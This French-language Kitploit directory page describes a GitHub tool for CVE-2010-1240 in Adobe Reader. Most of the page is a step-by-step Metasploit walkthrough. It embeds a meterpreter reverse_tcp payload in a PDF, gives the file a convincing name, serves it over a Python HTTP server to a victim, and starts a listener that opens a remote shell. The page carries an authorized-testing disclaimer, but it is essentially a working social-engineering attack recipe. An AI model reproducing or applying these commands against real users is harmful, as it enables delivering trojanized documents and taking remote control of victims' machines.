Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2010-1240 — Outil d'incorporation de backdoor PDF basé sur Metasploit exploitant CVE-2010-1240 pour livrer des charges utiles meterpreter par ingénierie sociale pour des tests d'intrusion autorisés. | Kitploit
Outils/GitHubGitHub/asepsaepdin/cve-2010-1240
Outils de PhishingFrameworks d'ExploitationExploitation d'Applications WebTests d'IntrusionIngénierie SocialeDéveloppement de Charges Utiles
GitHubasepsaepdin/cve-2010-1240

CVE-2010-1240

Outil d'incorporation de backdoor PDF basé sur Metasploit exploitant CVE-2010-1240 pour livrer des charges utiles meterpreter par ingénierie sociale pour des tests d'intrusion autorisés.

Voir le dépôt
11il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2010-1240 - Intégration d'une porte dérobée dans un PDF

Python


⚠️ À des fins éducatives et de recherche de sécurité autorisées uniquement

Description

Adobe Reader et Acrobat 9.x avant 9.3.3, et 8.x avant 8.2.3 sur Windows et Mac OS X, ne restreignent pas le contenu d'un champ de texte dans la boîte de dialogue d'avertissement du lancement d'un fichier, ce qui facilite la tâche des attaquants distants pour tromper les utilisateurs en les incitant à exécuter un programme local arbitraire spécifié dans un document PDF, comme illustré par un champ de texte qui prétend que le bouton Ouvrir permettra à l'utilisateur de lire un message crypté.

Demo

Animation

Guide étape par étape

  1. Tout d'abord, exécutez msfconsole

    root@kitploit:~
    msfconsole
    
  2. Ensuite, définissez la charge utile pour l'intégration du PDF

    root@kitploit:~
    use exploit/windows/fileformat/adobe_pdf_embedded_exe
    
  3. Définissez l'option INFILENAME et fournissez le chemin direct vers le fichier PDF original

    root@kitploit:~
    set INFILENAME /home/kali/Downloads/certificate-foundations-of-threat-hunting-60c893e734422a67991e093c.pdf
    
  4. Définissez le nom du nouveau fichier PDF malveillant à quelque chose de plus convaincant en définissant l'option FILENAME

    root@kitploit:~
    set FILENAME laporan.pdf
    
  5. Trouvez et intégrez la charge utile dans le fichier PDF

    root@kitploit:~
    set payload windows/meterpreter/reverse_tcp
    
  6. Définissez l'option LHOST sur l'adresse IP de l'attaquant

    root@kitploit:~
    set LHOST 172.16.10.10
    
  7. Ouvrez un nouveau terminal et accédez à l'emplacement du fichier PDF malveillant

    root@kitploit:~
    cd .msf4/local/
    
  8. Créez un serveur temporaire en python

    root@kitploit:~
    python -m http.server
    

Crédits

  • https://nvd.nist.gov/vuln/detail/CVE-2010-1240
  • https://medium.com/purple-team/embedding-backdoor-into-pdf-files-1781dfce62b1
  • https://github.com/Jasmoon99/Embedded-PDF
Télécharger l’outil
  • Téléchargez le fichier PDF malveillant sur la machine de la victime

    root@kitploit:~
    http://172.16.10.10:8000/certificate.pdf
    
  • Avant d'exécuter le fichier PDF malveillant sur la machine de la victime, démarrez l'écouteur sur le terminal précédent

    root@kitploit:~
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set LHOST 172.16.10.10
    exploit
    
  • Une fois que le fichier PDF malveillant est exécuté sur la machine de la victime, il vous donnera une connexion à la machine de la victime